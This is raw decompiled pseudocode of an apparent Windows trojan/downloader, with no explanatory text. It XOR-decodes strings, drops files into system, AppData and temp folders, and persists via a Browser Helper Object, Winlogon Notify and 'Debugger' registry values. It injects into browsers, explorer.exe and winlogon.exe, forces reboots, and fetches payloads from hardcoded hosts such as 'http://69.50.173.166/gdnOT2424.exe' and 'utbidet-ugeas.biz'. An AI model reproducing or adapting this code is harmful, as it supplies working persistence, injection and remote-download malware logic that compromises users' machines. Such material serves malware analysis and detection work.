						if( *(_t969 + 0x1c) != 0) {
							goto L61;
						}
						E0040265F(0);
						goto L40;
					} else {
						L3:
						_t809 = CreateToolhelp32Snapshot(2, 0);
						_t968 = _t809;
						if(_t809 == 0) {
							L29:
							__eflags =  *((intOrPtr*)(_t969 + 0x34)) - 0xb;
							if( *((intOrPtr*)(_t969 + 0x34)) <= 0xb) {
								_t811 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connection Policy", 0, 0x20019, _t969 + 0x98);
								__eflags = _t811;
								if(_t811 == 0) {
									 *(_t969 + 0x30) = 0;
									_t813 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connection Policy", 0, 0, 0, 0xf003f, 0x408778, _t969 + 0x98, 0);
									__eflags = _t813;
									if(_t813 == 0) {
										 *(_t969 + 0x9c) = 0x12;
										_t816 = RegQueryValueExA( *(_t969 + 0xac), "Default Flags", 0, 0, 0x412190, _t969 + 0x9c);
										__eflags = _t816;
										if(_t816 == 0) {
											_t819 = RegSetValueExA( *(_t969 + 0xa8), "Default Flags", 0, 3, 0x412190, 0x12);
											__eflags = _t819;
											_t42 = _t819 == 0;
											__eflags = _t42;
											 *(_t969 + 0x30) = (_t819 & 0xffffff00 | _t42) & 0x000000ff;
										}
										RegCloseKey( *(_t969 + 0x94));
										__eflags =  *(_t969 + 0x30);
										if( *(_t969 + 0x30) == 0) {
											RegDeleteKeyA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connection Policy");
										}
									}
									RegCloseKey( *(_t969 + 0x98));
								}
							}
							do {
								L40:
								CloseHandle( *(_t969 + 0x10)); // executed
								do {
									 *((intOrPtr*)(_t969 + 0x34)) =  *((intOrPtr*)(_t969 + 0x34)) + 1;
									_push( *((intOrPtr*)(_t969 + 0x34)));
									wsprintfA(0x408816, "%02X");
									_t775 = CreateMutexA(0x408778, 1, "qnd_b__-12"); // executed
									 *(_t969 + 0x1c) = _t775;
									_t969 = _t969 + 0xc;
								} while (_t775 == 0);
								if(GetLastError() != 0xb7) {
									goto L39;
								} else {
									goto L0;
								}
								goto L3;
								L39:
								__eflags =  *((intOrPtr*)(_t969 + 0x34)) - 0x11;
							} while ( *((intOrPtr*)(_t969 + 0x34)) <= 0x11);
							_t879 = _t969 + 0x134c;
							_t777 = ExpandEnvironmentStringsA("%ComSpec%", _t879, 0x104);
							__eflags = _t777;
							if(_t777 != 0) {
								_t803 = CreateFileA(_t879, 0x80000000, 1, 0, 3, 0, 0); // executed
								 *(_t969 + 0xa0) = _t803;
								__eflags = _t803 - 0xffffffff;
								_t935 = _t803;
								if(_t803 != 0xffffffff) {
									GetFileTime(_t935, _t969 + 0x84, _t969 + 0x88, _t969 + 0x8c);
									CloseHandle( *(_t969 + 0xa0));
									 *(_t969 + 0xc) = 1;
								}
							}
							__eflags =  *(_t969 + 0x1c);
							if( *(_t969 + 0x1c) != 0) {
								L63:
								_t414 = CreateFileA(_t969 + 0x1580, 0x80000000, 1, 0, 3, 0, 0);
								 *(_t969 + 0xa0) = _t414;
								__eflags = _t414;
								if(_t414 == 0) {
									L66:
									 *(_t969 + 0x14) = 0;
									_t966 = 0;
									__eflags = 0;
									L67:
									CloseHandle(CreateThread(0, 0x1000, E00401038, _t969 + 0x1570, 0, _t969 + 0x9c));
									_t419 = 0x408720;
									while(1) {
										__eflags = _t419 - 0x408776;
										if(_t419 >= 0x408776) {
											break;
										}
										 *_t419 =  *_t419 ^ 0x000000d4;
										_t419 =  &(_t419[1]);
									}
									while(1) {
										__eflags = 0x407b20 - 0x408720;
										if(0x407b20 >= 0x408720) {
											break;
										}
										 *0x407b20 =  *0x407b20 ^ 0x0000004d;
										__eflags =  *0x407b20;
										 *(_t966 + 0x40) =  *(_t966 + 0x40) ^ _t889;
									}
									__eflags =  *0x412100 - 2;
									if( *0x412100 != 2) {
										L99:
										 *(_t969 + 0x78) = 0x10;
										_t841 = _t969 + 0x1ec;
										_t422 = GetComputerNameA(_t841, _t969 + 0x78);
										__eflags = _t422;
										if(_t422 == 0) {
											L101:
											_push("QlC5hT0yHn63XEm5LqJ2OxSkGj2v");
											_push(_t969 + 0x1bc);
											L00405E20();
											L105:
											wsprintfA(0x4122b0, "{%02X%02X%02X%02X-%02x%02x-%02x%02x-%02X%02X-%02X%02X%02X%02X%02x%02x}",  *((char*)(_t969 + 0x1f4)),  *((char*)(_t969 + 0x1f1)),  *((char*)(_t969 + 0x1ee)),  *((char*)(_t969 + 0x1eb)),  *((char*)(_t969 + 0x1e8)),  *((char*)(_t969 + 0x1e5)),  *((char*)(_t969 + 0x1e2)),  *((char*)(_t969 + 0x1df)),  *((char*)(_t969 + 0x1dc)),  *((char*)(_t969 + 0x1d9)),  *((char*)(_t969 + 0x1d6)),  *((char*)(_t969 + 0x1d3)),  *((char*)(_t969 + 0x1d0)),  *((char*)(_t969 + 0x1cd)),  *((char*)(_t969 + 0x1ca)),  *((char*)(_t969 + 0x1c7)));
											_t970 = _t969 + 0x48;
											_t441 = 0x407aa0;
											while(1) {
												__eflags = _t441 - 0x407ad5;
												if(_t441 >= 0x407ad5) {
													break;
												}
												 *_t441 =  *_t441 ^ 0x000000d4;
												_t441 =  &(_t441[1]);
											}
											while(1) {
												__eflags = 0x4072a0 - 0x407aa0;
												if(0x4072a0 >= 0x407aa0) {
													break;
												}
												 *0x4072a0 =  *0x4072a0 ^ 0x0000004d;
												__eflags =  *0x4072a0;
												 *(_t966 + 0x40) =  *(_t966 + 0x40) ^ _t889;
											}
											_push(0x4122b0);
											_push(0x407aa0);
											_t842 =  &(_t970[0x410]);
											_push(_t842);
											L00405E20();
											_push(0x4072a0);
											L00405E30();
											_t444 = RegCreateKeyA(0x80000002, _t842,  &(_t970[0x26]));
											__eflags = _t444;
											if(_t444 != 0) {
												L136:
												_t446 = E004030DE( &(_t970[0x1ee]));
												_t970[0x26] = _t446;
												__eflags = _t446;
												if(_t446 == 0) {
													L156:
													_t447 = E004010B2();
													__eflags = _t447;
													_t897 = _t447;
													if(_t447 == 0) {
														_t897 = 0x42;
													}
													_t970[0x1ee] = _t897;
													_t448 = E004010B2();
													__eflags = _t448;
													_t898 = _t448;
													if(_t448 == 0) {
														_t898 = 0x4d;
													}
													_t970[0x162] = _t898;
													_push( *0x4120b0);
													_push( &(_t970[0x163]));
													L00405E20();
													_push( &(_t970[0x55a]));
													_push( &(_t970[0x1ac]));
													L00405E20();
													_t943 = _t970[5];
													_t452 = _t943 + _t966;
													while(1) {
														__eflags = _t943 - _t452;
														if(_t943 >= _t452) {
															break;
														}
														 *_t943 =  *_t943 ^ _t970[0x162] & 0x000000ff;
														_t943 =  &(_t943[0]);
														_t452 = _t970[5] + _t966;
													}
													_t843 =  &(_t970[0x517]);
													_t453 = ExpandEnvironmentStringsA("%AppData%\\", _t843, 0x104);
													__eflags = _t453;
													if(_t453 == 0) {
														L167:
														_t844 =  &(_t970[0x516]);
														_t454 = GetTempPathA(0x104, _t844);
														__eflags = _t454;
														if(_t454 == 0) {
															L175:
															E00401029(_t970[5]);
															_t845 =  &(_t970[0x387]);
															_t457 = GetSystemDirectoryA(_t845, 0x104);
															_push(0x80);
															_push( *0x4120c0);
															_push(0x41103e);
															_push(_t845);
															L00405E30();
															L00405E30();
															SetFileAttributesA(_t457, _t457);
															_t459 = CreateFileA(_t845, 0x40000000, 0, 0, 2, 0x80, 0);
															_t970[0x28] = _t459;
															__eflags = _t459;
															if(_t459 == 0) {
																L182:
																_t460 = GetLastError();
																__eflags = _t460 - 0x20;
																if(_t460 != 0x20) {
																	_t846 =  &(_t970[0x387]);
																	_t461 = ExpandEnvironmentStringsA("%AppData%\\", _t846, 0x104);
																	_push(0x80);
																	_push( *0x4120c0);
																	L00405E30();
																	SetFileAttributesA(_t461, _t846);
																	_t463 = CreateFileA(_t846, 0x40000000, 0, 0, 2, 0x80, 0);
																	_t970[0x28] = _t463;
																	__eflags = _t463;
																	if(_t463 == 0) {
																		L186:
																		_t464 = GetLastError();
																		__eflags = _t464 - 0x20;
																		if(_t464 == 0x20) {
																			goto L183;
																		}
																		_t635 = GetTempPathA(0x104, _t846);
																		_push(0x80);
																		_push( *0x4120c0);
																		L00405E30();
																		SetFileAttributesA(_t635, _t846);
																		_t637 = CreateFileA(_t846, 0x40000000, 0, 0, 2, 0x80, 0);
																		_t970[0x28] = _t637;
																		__eflags = _t637;
																		if(_t637 == 0) {
																			L189:
																			_t638 = GetLastError();
																			__eflags = _t638 - 0x20;
																			if(_t638 == 0x20) {
																				goto L183;
																			}
																			L192:
																			_t847 =  &(_t970[0x343]);
																			_t469 = ExpandEnvironmentStringsA("%AppData%\\", _t847, 0x104);
																			_push(0x80);
																			_push( *0x4120d0);
																			L00405E30();
																			SetFileAttributesA(_t469, _t847);
																			_t471 = CreateFileA(_t847, 0x40000000, 0, 0, 2, 0x80, 0);
																			_t970[0x28] = _t471;
																			__eflags = _t471;
																			_t899 = _t471;
																			if(_t471 == 0) {
																				L194:
																				_t848 =  &(_t970[0x342]);
																				_t472 = GetTempPathA(0x104, _t848);
																				_push(0x80);
																				_push( *0x4120d0);
																				L00405E30();
																				SetFileAttributesA(_t472, _t848);
																				_t474 = CreateFileA(_t848, 0x40000000, 0, 0, 2, 0x80, 0);
																				_t970[0x28] = _t474;
																				__eflags = _t474;
																				_t899 = _t474;
																				if(_t474 == 0) {
																					L197:
																					_t970[0x342] = 0;
																					L198:
																					__eflags = _t970[0x342];
																					if(_t970[0x342] != 0) {
																						CreateFileA( &(_t970[0x348]), 0x80000000, 1, 0, 3, 0, 0);
																					}
																					_t849 =  &(_t970[0x2b]);
																					GetSystemDirectoryA(_t849, 0x104);
																					_push(0x41103e);
																					_push(_t849);
																					L00405E30();
																					E004012C2(_t849);
																					ExpandEnvironmentStringsA("%CommonProgramFiles%\\System\\", _t849, 0x104);
																					E004012C2(_t849);
																					ExpandEnvironmentStringsA("%AppData%\\", _t849, 0x104);
																					E004012C2(_t849);
																					_t484 = 0x407220;
																					while(1) {
																						__eflags = _t484 - 0x40724d;
																						if(_t484 >= 0x40724d) {
																							break;
																						}
																						 *_t484 =  *_t484 ^ 0x000000d4;
																						_t484 =  &(_t484[1]);
																					}
																					_t485 = RegOpenKeyExA(0x80000002, 0x407220, 0, 0x20006,  &(_t970[0x26]));
																					__eflags = _t485;
																					if(_t485 == 0) {
																						L205:
																						__eflags = _t970[0xb];
																						if(_t970[0xb] == 0) {
																							_t862 =  &(_t970[0x55a]);
																							_t625 = E00401251(_t970[0x26]);
																							_push(_t862);
																							L00405E40();
																							_t626 = _t625 + 1;
																							__eflags = _t626;
																							RegSetValueExA(_t970[0x2b],  *0x4120b0, 0, 1, _t862, _t626);
																						}
																						RegDeleteValueA(_t970[0x27], "winrnt.exe");
																						RegCloseKey(_t970[0x26]);
																						L208:
																						__eflags =  *0x412100 - 2;
																						if( *0x412100 != 2) {
																							L248:
																							CloseHandle(CreateThread(0, 0x10000, E0040265F, 2, 0,  &(_t970[0x27])));
																							_t490 = 0x407000;
																							while(1) {
																								__eflags = _t490 - 0x407060;
																								if(_t490 >= 0x407060) {
																									break;
																								}
																								 *_t490 =  *_t490 ^ 0x000000d4;
																								_t490 =  &(_t490[1]);
																							}
																							_t970[0xc] = 0;
																							while(1) {
																								E004011CF(0x80000002, 0x407000);
																								__eflags = _t970[0xc] - 9;
																								if(_t970[0xc] <= 9) {
																									goto L287;
																								}
																								_t970[0x16] = 0;
																								_t970[0x17] = 0;
																								_t549 = E004025C3();
																								__eflags = _t549;
																								if(_t549 != 0) {
																									L284:
																									 *_t970 = 0;
																									L288:
																									_t970[0xd] = 0x3b;
																									do {
																										__eflags = _t970[0x342];
																										if(_t970[0x342] != 0) {
																											_push(0);
																											_push("opera.exe");
																											_push("seamonkey.exe");
																											_push("mozilla.exe");
																											_push("firefox.exe");
																											_push("iexplore.exe");
																											_push("explorer.exe");
																											E0040318D( &(_t970[0x349]));
																											_t970 =  &(_t970[8]);
																										}
																										__eflags = _t970[0xa];
																										if(_t970[0xa] != 0) {
																											_t853 =  &(_t970[0x3cb]);
																											SetFileAttributesA(_t853, 0x21);
																											_t526 = RegCreateKeyA(0x80000002,  &(_t970[0x40f]),  &(_t970[0x26]));
																											__eflags = _t526;
																											if(_t526 == 0) {
																												E00401251(_t970[0x26]);
																												_t970[0x27] = 1;
																												_t530 = RegSetValueExA(_t970[0x2b], "IsInstalled", 0, 4,  &(_t970[0x28]), 4);
																												_push(_t853);
																												L00405E40();
																												_t531 = _t530 + 1;
																												__eflags = _t531;
																												RegSetValueExA(_t970[0x2b], "StubPath", 0, 1, _t853, _t531);
																												RegCloseKey(_t970[0x26]);
																											}
																										}
																										__eflags = _t970[0xb];
																										_t944 =  &(_t970[0x26]);
																										if(_t970[0xb] == 0) {
																											_t493 = RegOpenKeyExA(0x80000002, 0x407220, 0, 0x20006, _t944);
																											__eflags = _t493;
																											if(_t493 == 0) {
																												L299:
																												_t850 =  &(_t970[0x55a]);
																												_push(_t850);
																												L00405E40();
																												_t494 = _t493 + 1;
																												__eflags = _t494;
																												_push(_t494);
																												_push(_t850);
																												_push(1);
																												_push(0);
																												_push( *0x4120b0);
																												goto L300;
																											}
																											_t493 = RegOpenKeyExA(0x80000001, 0x407220, 0, 0x20006, _t944);
																											__eflags = _t493;
																											if(_t493 != 0) {
																												goto L301;
																											}
																											goto L299;
																										} else {
																											_t854 =  &(_t970[0x48f]);
																											SetFileAttributesA(_t854, 0x21);
																											_t500 = RegCreateKeyA(0x80000002, 0x408720, _t944);
																											__eflags = _t500;
																											if(_t500 != 0) {
																												L301:
																												__eflags = _t970[9];
																												if(_t970[9] == 0) {
																													goto L311;
																												}
																												_t851 =  &(_t970[0x27]);
																												_t501 = RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0x408778, _t851, 0);
																												__eflags = _t501;
																												if(_t501 == 0) {
																													L304:
																													RegSetValueExA(_t970[0x2b], "SubshellState", 0, 3,  &(_t970[0x1ef]), 0x22a);
																													RegCloseKey(_t970[0x26]);
																													L305:
																													_t852 =  &(_t970[0x387]);
																													SetFileAttributesA(_t852, 0x21);
																													__eflags =  *0x412100 - 2;
																													_t947 =  &(_t970[0x26]);
																													if( *0x412100 != 2) {
																														_t506 = RegCreateKeyA(0x80000000, "CLSID\\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}\\InProcServer32", _t947);
																														__eflags = _t506;
																														if(_t506 != 0) {
																															goto L311;
																														}
																														_push(_t852);
																														L00405E40();
																														RegSetValueExA(_t970[0x2b], 0, 0, 1, _t852, _t506 + 1);
																														RegSetValueExA(_t970[0x2b], "ThreadingModel", 0, 1, "Both", 5);
																														RegCloseKey(_t970[0x26]);
																														_t511 = RegCreateKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects\\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}", _t947);
																														__eflags = _t511;
																														if(_t511 != 0) {
																															goto L311;
																														}
																														L310:
																														RegCloseKey(_t970[0x26]);
																														goto L311;
																													}
																													_t513 = RegCreateKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B}", _t947);
																													__eflags = _t513;
																													if(_t513 != 0) {
																														goto L311;
																													}
																													_t515 = E00401251(_t970[0x26]);
																													_push(_t852);
																													L00405E40();
																													RegSetValueExA(_t970[0x2b], "DLLName", 0, 1, _t852, _t515 + 1);
																													RegSetValueExA(_t970[0x2b], "Startup", 0, 1, "Startup", 8);
																													goto L310;
																												}
																												_t519 = RegCreateKeyExA(0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0x408778, _t851, 0);
																												__eflags = _t519;
																												if(_t519 != 0) {
																													goto L305;
																												}
																												goto L304;
																											}
																											_t521 = E00401251(_t970[0x26]);
																											_push(_t854);
																											L00405E40();
																											_push(_t521 + 1);
																											_push(_t854);
																											_push(1);
																											_push(0);
																											_push("Debugger");
																											L300:
																											RegSetValueExA(_t970[0x2b], ??, ??, ??, ??, ??);
																											RegCloseKey(_t970[0x26]);
																											goto L301;
																										}
																										L311:
																										SetFileAttributesA( &(_t970[0x55b]), 0x21);
																										Sleep(0x3e8);
																										_t400 =  &(_t970[0xd]);
																										 *_t400 = _t970[0xd] - 1;
																										__eflags =  *_t400;
																									} while ( *_t400 >= 0);
																									_t537 = RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0,  &(_t970[0x12]), 0);
																									__eflags = _t537;
																									if(_t537 == 0) {
																										_t970[0x10] = 4;
																										_t858 =  &(_t970[0x10]);
																										_t539 = RegQueryValueExA(_t970[0x16], "g00d d0gg", 0, 0, _t858,  &(_t970[0x10]));
																										__eflags = _t539;
																										if(_t539 == 0) {
																											_t542 = _t970[0xf] - 1;
																											__eflags = _t542;
																											_t970[0xf] = _t542;
																											if(_t542 == 0) {
																												RegDeleteValueA(_t970[0x12], "g00d d0gg");
																												Sleep(0x1388);
																												__eflags =  *0x412100 - 2;
																												if( *0x412100 != 2) {
																													ExitWindowsEx(6, 0);
																												} else {
																													RtlAdjustPrivilege(0x13, 1, 0,  &(_t970[0xe]));
																													 *0x412240(1);
																												}
																											} else {
																												RegSetValueExA(_t970[0x16], "g00d d0gg", 0, 4, _t858, 4);
																											}
																										}
																										RegCloseKey(_t970[0x11]);
																									}
																									continue;
																								}
																								_t551 = RegCreateKeyExA(0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0x2001f, 0,  &(_t970[0x1c]), 0);
																								__eflags = _t551;
																								if(_t551 != 0) {
																									__eflags =  *_t970;
																									if( *_t970 == 0) {
																										goto L288;
																									}
																									L286:
																									_t970[0xc] = 0;
																									goto L288;
																								}
																								_t967 =  &(_t970[0x19]);
																								GetSystemTimeAsFileTime(_t967);
																								_t970[0x18] = 8;
																								_t937 =  &(_t970[0x17]);
																								_t553 = RegQueryValueExA(_t970[0x20], "ConnPred", 0,  &(_t970[0x17]), _t937,  &(_t970[0x18]));
																								__eflags = _t553;
																								if(_t553 != 0) {
																									L257:
																									__eflags = E004014D8(_t967, 0x412070) - 0x4af;
																									if(__eflags <= 0) {
																										L268:
																										__eflags =  *0x412080;
																										if( *0x412080 == 0) {
																											L271:
																											_t970[0x18] = 8;
																											__eflags = RegQueryValueExA(_t970[0x20], "UseExtProfile", 0,  &(_t970[0x17]), _t937,  &(_t970[0x18]));
																											if(__eflags != 0) {
																												L273:
																												_t558 = E00402427(__eflags);
																												__eflags = _t558;
																												if(_t558 != 0) {
																													L283:
																													RegCloseKey(_t970[0x1b]);
																													goto L284;
																												}
																												_push(1);
																												_push(0);
																												_t561 = E0040211B("http://69.50.173.166/gdnOT2424.exe", 0);
																												__eflags = _t561;
																												if(_t561 == 0) {
																													L276:
																													_t970[0x18] = 8;
																													_t856 =  &(_t970[0x13]);
																													_t563 = RegQueryValueExA(_t970[0x20], "UseDflProfile", 0,  &(_t970[0x17]),  &(_t970[0x13]),  &(_t970[0x18]));
																													__eflags = _t563;
																													if(_t563 != 0) {
																														_t572 = _t970[0x16] + 0x1162f100;
																														__eflags = _t572;
																														asm("adc edx, 0xffffff9b");
																														_t970[0x12] = _t572;
																														_t970[0x13] = _t970[0x17];
																													}
																													__eflags = E004014D8( &(_t970[0x19]), _t856) - 0x152ab;
																													if(__eflags <= 0) {
																														goto L283;
																													} else {
																														_t566 = E00402427(__eflags);
																														__eflags = _t566;
																														if(_t566 != 0) {
																															goto L283;
																														}
																														_push(3);
																														_push(0);
																														_t568 = E0040211B("tombul.gif", 0);
																														__eflags = _t568;
																														if(_t568 == 0) {
																															goto L283;
																														}
																														_push(8);
																														_push(_t967);
																														_push(0xb);
																														_push(0);
																														_push("UseDflProfile");
																														L282:
																														RegSetValueExA(_t970[0x20], ??, ??, ??, ??, ??);
																														RegCloseKey(_t970[0x1b]);
																														 *_t970 = 1;
																														goto L286;
																													}
																												}
																												_t970[0x16] = _t970[0x19].dwLowDateTime;
																												_t970[0x17] = _t970[0x1a];
																												_push(8);
																												_push(_t967);
																												_push(0xb);
																												_push(0);
																												_push("UseExtProfile");
																												goto L282;
																											}
																											__eflags = E004014D8( &(_t970[0x19]),  &(_t970[0x16])) - 0x152ab;
																											if(__eflags <= 0) {
																												goto L276;
																											}
																											goto L273;
																										}
																										_push(3);
																										_push(0);
																										_t577 = E0040211B("grazie.gif", 0);
																										__eflags = _t577;
																										if(_t577 == 0) {
																											goto L271;
																										}
																										_t970[0x16] = _t970[0x19].dwLowDateTime;
																										_t970[0x17] = _t970[0x1a];
																										_push(8);
																										_push(_t967);
																										_push(0xb);
																										_push(0);
																										_push("ConnPred");
																										goto L282;
																									}
																									_t579 = E00402427(__eflags);
																									__eflags = _t579;
																									if(_t579 != 0) {
																										goto L283;
																									}
																									_t581 = E004019E8("http://utbidet-ugeas.biz/d/cc", 0, 1);
																									_t946 = 0;
																									__eflags = _t581;
																									_t857 = _t581;
																									if(_t581 != 0) {
																										_t586 = E00401E00(_t581,  &(_t970[0x15]), 2);
																										__eflags = _t586 - 2;
																										if(_t586 == 2) {
																											_t946 = 1;
																										}
																									}
																									E00401F59(_t857);
																									__eflags = _t946;
																									if(_t946 == 0) {
																										 *0x412080 = 0;
																									} else {
																										 *0x412070 = _t970[0x19];
																										_t585 = 0;
																										__eflags = _t970[0x14] - 0x49;
																										 *0x412074 = _t970[0x1a];
																										if(_t970[0x14] == 0x49) {
																											__eflags = _t970[0x14] - 0x54;
																											if(_t970[0x14] == 0x54) {
																												_t585 = 1;
																											}
																										}
																										 *0x412080 = _t585;
																									}
																									goto L268;
																								}
																								_t588 = E004014D8(_t967, _t937);
																								__eflags = _t588 - 0x152ab;
																								if(_t588 <= 0x152ab) {
																									goto L271;
																								}
																								goto L257;
																								L287:
																								_t363 =  &(_t970[0xc]);
																								 *_t363 = _t970[0xc] + 1;
																								__eflags =  *_t363;
																								goto L288;
																							}
																						}
																						_t589 = 0x4071e0;
																						while(1) {
																							__eflags = _t589 - 0x407214;
																							if(_t589 >= 0x407214) {
																								break;
																							}
																							 *_t589 =  *_t589 ^ 0x000000d4;
																							_t589 =  &(_t589[1]);
																						}
																						_t590 = 0x4071c3;
																						while(1) {
																							__eflags = _t590 - 0x4071cf;
																							if(_t590 >= 0x4071cf) {
																								break;
																							}
																							 *_t590 =  *_t590 ^ 0x000000d4;
																							_t590 =  &(_t590[1]);
																						}
																						_t948 =  &(_t970[0x26]);
																						_t591 = RegCreateKeyA(0x80000002, 0x4071e0, _t948);
																						__eflags = _t591;
																						if(_t591 == 0) {
																							RegSetValueExA(_t970[0x2b], 0x4071c3, 0, 4,  &(_t970[0x28]), 4);
																							RegCloseKey(_t970[0x26]);
																						}
																						_t592 = 0x4071a0;
																						while(1) {
																							__eflags = _t592 - 0x4071c2;
																							if(_t592 >= 0x4071c2) {
																								break;
																							}
																							 *_t592 =  *_t592 ^ 0x000000d4;
																							_t592 =  &(_t592[1]);
																						}
																						_t593 = 0x407177;
																						while(1) {
																							__eflags = _t593 - 0x407188;
																							if(_t593 >= 0x407188) {
																								break;
																							}
																							 *_t593 =  *_t593 ^ 0x000000d4;
																							_t593 =  &(_t593[1]);
																						}
																						_t594 = 0x407160;
																						while(1) {
																							__eflags = _t594 - 0x407176;
																							if(_t594 >= 0x407176) {
																								break;
																							}
																							 *_t594 =  *_t594 ^ 0x000000d4;
																							_t594 =  &(_t594[1]);
																						}
																						_t595 = 0x40714a;
																						while(1) {
																							__eflags = _t595 - 0x40715f;
																							if(_t595 >= 0x40715f) {
																								break;
																							}
																							 *_t595 =  *_t595 ^ 0x000000d4;
																							_t595 =  &(_t595[1]);
																						}
																						_t596 = 0x407135;
																						while(1) {
																							__eflags = _t596 - 0x407149;
																							if(_t596 >= 0x407149) {
																								break;
																							}
																							 *_t596 =  *_t596 ^ 0x000000d4;
																							_t596 =  &(_t596[1]);
																						}
																						_t597 = RegOpenKeyExA(0x80000002, 0x4071a0, 0, 0x20006, _t948);
																						__eflags = _t597;
																						if(_t597 == 0) {
																							_t861 =  &(_t970[0x28]);
																							RegSetValueExA(_t970[0x2b], 0x407177, 0, 4, _t861, 4);
																							RegSetValueExA(_t970[0x2b], 0x407160, 0, 4, _t861, 4);
																							RegSetValueExA(_t970[0x2b], 0x40714a, 0, 4, _t861, 4);
																							RegSetValueExA(_t970[0x2b], 0x407135, 0, 4, _t861, 4);
																							RegCloseKey(_t970[0x26]);
																						}
																						_t598 = 0x4070c0;
																						while(1) {
																							__eflags = _t598 - 0x407134;
																							if(_t598 >= 0x407134) {
																								break;
																							}
																							 *_t598 =  *_t598 ^ 0x000000d4;
																							_t598 =  &(_t598[1]);
																						}
																						_t599 = RegOpenKeyExA(0x80000002, 0x4070c0, 0, 0x2001f, _t948);
																						__eflags = _t599;
																						if(_t599 != 0) {
																							goto L248;
																						}
																						_t601 = E00401000(0x8000);
																						_t970[0x1d] = 0x4000;
																						_t949 = _t601;
																						_t602 = 0x407080;
																						_t970[0x27] = 0x4000;
																						while(1) {
																							__eflags = _t602 - 0x4070a4;
																							if(_t602 >= 0x4070a4) {
																								break;
																							}
																							 *_t602 =  *_t602 ^ 0x000000d4;
																							_t602 =  &(_t602[1]);
																						}
																						_t970[0xd] = 0;
																						while(1) {
																							_t310 =  &(_t949[0x4000]); // 0x4000
																							_t859 = _t310;
																							_t606 = RegEnumValueA(_t970[0x2d], _t970[0x13], _t949,  &(_t970[0x2b]), 0,  &(_t970[0x1e]), _t310,  &(_t970[0x1d]));
																							__eflags = _t606;
																							if(_t606 != 0) {
																								break;
																							}
																							__eflags = _t970[0x1c] - 1;
																							if(_t970[0x1c] == 1) {
																								_t608 = E00401311(_t859, 0x40708d);
																								__eflags = _t608;
																								if(_t608 != 0) {
																									RegDeleteValueA(_t970[0x27], _t949);
																								}
																							}
																							_t305 =  &(_t970[0xd]);
																							 *_t305 = _t970[0xd] + 1;
																							__eflags =  *_t305;
																							_t970[0x1d] = 0x4000;
																							_t970[0x27] = 0x4000;
																						}
																						_t860 =  &(_t970[0x55a]);
																						_t611 = wsprintfA(_t949, 0x407080, _t860) + 1;
																						__eflags = _t611;
																						_t970 =  &(_t970[3]);
																						RegSetValueExA(_t970[0x2b], _t860, 0, 1, _t949, _t611);
																						E00401029(_t949);
																						RegCloseKey(_t970[0x26]);
																						goto L248;
																					}
																					_t629 = RegOpenKeyExA(0x80000001, 0x407220, 0, 0x20006,  &(_t970[0x26]));
																					__eflags = _t629;
																					if(_t629 != 0) {
																						goto L208;
																					}
																					goto L205;
																				}
																				__eflags = _t474 - 0xffffffff;
																				if(_t474 == 0xffffffff) {
																					goto L197;
																				}
																				L196:
																				WriteFile(_t899, 0x408840, 0x5e00,  &(_t970[0x28]), 0);
																				CloseHandle(_t970[0x28]);
																				goto L198;
																			}
																			__eflags = _t471 - 0xffffffff;
																			if(_t471 != 0xffffffff) {
																				goto L196;
																			}
																			goto L194;
																		}
																		__eflags = _t637 + 1;
																		if(_t637 + 1 != 0) {
																			L177:
																			WriteFile(_t970[0x2c], 0x40e640, 0x1400,  &(_t970[0x28]), 0);
																			__eflags = _t970[3];
																			if(_t970[3] != 0) {
																				SetFileTime(_t970[0x2b],  &(_t970[0x21]),  &(_t970[0x22]),  &(_t970[0x23]));
																			}
																			CloseHandle(_t970[0x28]);
																			_t970[9] = 1;
																			_push(0);
																			_push("winlogon.exe");
																			_t863 =  &(_t970[0x388]);
																			_t643 = E0040318D(_t863);
																			_t970 =  &(_t970[3]);
																			__eflags = _t643;
																			if(_t643 == 0) {
																				_push(0);
																				_push("explorer.exe");
																				E0040318D(_t863);
																				_t970 =  &(_t970[3]);
																			}
																			_push(0);
																			_push("kernel32.dll");
																			_push(_t863);
																			L191:
																			E0040318D();
																			_t970 =  &(_t970[3]);
																			CreateFileA( &(_t970[0x38c]), 0x80000000, 1, 0, 3, 0, 0);
																			goto L192;
																		}
																		goto L189;
																	}
																	__eflags = _t463 + 1;
																	if(_t463 + 1 != 0) {
																		goto L177;
																	}
																	goto L186;
																}
																L183:
																_t970[9] = 1;
																_push(0);
																_push("kernel32.dll");
																_push( &(_t970[0x388]));
																goto L191;
															}
															__eflags = _t459 + 1;
															if(_t459 + 1 == 0) {
																goto L182;
															}
															goto L177;
														} else {
															_t950 =  &(_t970[0x16a]);
															_t651 = GetTempFileNameA(_t844, "tmp", 0, _t950);
															__eflags = _t651;
															if(_t651 == 0) {
																goto L175;
															}
															_t652 = CreateFileA(_t950, 0x40000000, 0, 0, 2, 0x80, 0);
															_t970[0x28] = _t652;
															__eflags = _t652;
															if(_t652 == 0) {
																goto L175;
															}
															__eflags = _t652 + 1;
															if(_t652 + 1 == 0) {
																goto L175;
															}
															L172:
															WriteFile(_t970[0x2c], _t970[8], _t966,  &(_t970[0x28]), 0);
															CloseHandle(_t970[0x28]);
															CreateFileA( &(_t970[0x170]), 0x80000000, 1, 0, 3, 0, 0);
															_t951 =  &(_t970[0x1ee]);
															_t923 =  &(_t970[0x162]);
															_t893 =  &(_t970[0x278]);
															while(1) {
																__eflags = _t951 - _t893;
																if(_t951 >= _t893) {
																	goto L175;
																}
																_t660 = _t970[0x1ee] & 0x000000ff ^  *_t923;
																_t923 =  &(_t923[0]);
																 *_t951 = _t660;
																_t951 =  &(_t951[1]);
